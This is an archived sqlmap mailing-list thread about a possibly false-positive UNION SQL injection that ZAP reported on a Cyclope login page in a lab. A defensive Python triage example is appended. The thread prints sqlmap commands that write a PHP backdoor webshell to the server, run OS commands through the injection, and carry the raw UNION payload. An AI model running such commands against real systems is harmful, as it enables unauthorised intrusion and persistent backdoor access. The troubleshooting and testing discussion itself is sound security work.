I did not read your first email, so ignore my blitherings :)
On Fri, Mar 21, 2014 at 1:16 PM, Brandon Perry <bperry.volat...@gmail.com>wrote:
> Brian,
>
> I expect the program is taking the input for username and truncating it,
> so ZAP sees the injection going in and a successful auth afterwards and
> assumes the payload worked. I think this is a poor assumption to make.
>
>
> On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>
>> There is always a 302 redirect, so I am not sure how ZAP detected this as
>> a SQLi.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hurrikane.net> wrote:
>>
>>> Thanks for the quick response, Miroslav and Bernardo. It's very much
>>> appreciated! There is a UNION technique that is being reported by ZAP, but
>>> sqlmap isn't finding it and I haven't quite figured out how to simply tell
>>> it what to use explicitly. ZAP detects a UNION vulnerability on
>>> activate.php:
>>>
>>>
>>>
>>> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>>>
>>> My attempts to input this have not been successful, so I'm not sure if
>>> it's a false positive or I'm not using sqlmap quite right (more likely).
>>>
>>> CMDLINE
>>> sqlmap -u "http://172.16.71.138:7879/activate.php"
>>> --data='act=auth-login&page=login&username=admin&password=admin' -p
>>> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
>>> /usr/share/webshells/php/simple-backdoor.php --file-dest
>>> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL
>>> select NULL --"
>>>
>>> As for the previous method, here's the attached file (on screen output
>>> was massive - password is "password"). End result "[09:01:51] [CRITICAL]
>>> all tested parameters appear to be not injectable. Also, you can try to
>>> rerun by providing either a valid value for option '--string' (or
>>> '--regexp')"
>>>
>>> Thanks for the help!
>>>
>>> Brian
>>>
>>>
>>>
>>> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <
>>> bernardo.dam...@gmail.com> wrote:
>>>
>>>> On 21 March 2014 11:57, Bernardo Damele A. G. <
>>>> bernardo.dam...@gmail.com> wrote:
>>>> > [...]
>>>> > All in all, can you please relaunch sqlmap (make sure you run git pull
>>>> > first to sync to the GitHub repository) with the following syntax:
>>>>
>>>> Command line:
>>>>
>>>> python sqlmap.py -u "http://172.16.71.138:7879/index.php"
>>>> --data="act=auth-login&pag=login&username=admin&password=admin" -p
>>>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3
>>>> --parse-errors -t traffic.log --answers "language does the web server
>>>> support=4,do you want to use for writable=2,comma separate list of
>>>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>>>
>>>> Feel free to report back the result, the entire standard output of
>>>> sqlmap and send me the traffic.log.
>>>>
>>>> Thank you.
>>>> Bernardo
>>>>
>>>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Learn Graph Databases - Download FREE O'Reilly Book
>>> "Graph Databases" is the definitive new guide to graph databases and
>>> their
>>> applications. Written by three acclaimed leaders in the field,
>>> this first edition is now available. Download your free book today!
>>> http://p.sf.net/sfu/13534_NeoTech
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>>
>>
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
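Brandon's and Miroslav's points above (a payload followed by an apparently successful login proves nothing, and an endpoint that answers 302 to everything gives a scanner nothing to compare) as an added example that is not part of this thread. The two login stand-ins, the `Response` type, the probe set and `triage` are constructed for illustration; the 16-character truncation limit is an assumption.

```python
"""Added example (not code from the thread): triaging a scanner's UNION
finding by comparing responses to a baseline, the reported payload and a
deliberately malformed control.  Identical responses mean the finding is
unconfirmed; only a payload-specific difference is worth a closer look."""
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Response:
    status: int
    location: str
    body: str

# Constructed probes: normal login, the UNION payload ZAP reported, and a
# control whose SQL is broken.  A real injection point should treat the
# well-formed and the malformed payload differently.
PROBES = {
    "baseline": ("admin", "admin"),
    "union": ("ZAP' UNION ALL select NULL -- ", "ZAP"),
    "control": ("ZAP' UNION ALL select -- ", "ZAP"),
}

def login_always_302(username: str, password: str) -> Response:
    """Stand-in for the endpoint discussed: truncates the username (assumed
    16-char limit) and redirects regardless of what was submitted."""
    username = username[:16]  # truncated value never influences the reply
    return Response(302, "/index.php?pag=login", "")

def login_quote_sensitive(username: str, password: str) -> Response:
    """Stand-in that answers any quote in the username with a generic error
    page: valid and malformed SQL look alike, so still no UNION evidence."""
    if "'" in username:
        return Response(200, "", "<h1>Login failed</h1>")
    return Response(302, "/index.php?pag=login", "")

def fingerprint(r: Response) -> tuple:
    # Status, redirect target and body length suffice to tell replies apart.
    return (r.status, r.location, len(r.body))

def triage(send: Callable[[str, str], Response]) -> str:
    fps = {name: fingerprint(send(*args)) for name, args in PROBES.items()}
    if len(set(fps.values())) == 1:
        return "unconfirmed: every probe produced the same response"
    if fps["union"] != fps["baseline"] and fps["control"] == fps["baseline"]:
        return "suspicious: only the well-formed payload changed the response"
    return "inconclusive: responses differ, but not in a payload-specific way"
```

Against the always-302 stand-in `triage` reports "unconfirmed", which is the situation Miroslav describes; a scanner that counts the subsequent redirect as a successful login would still flag it.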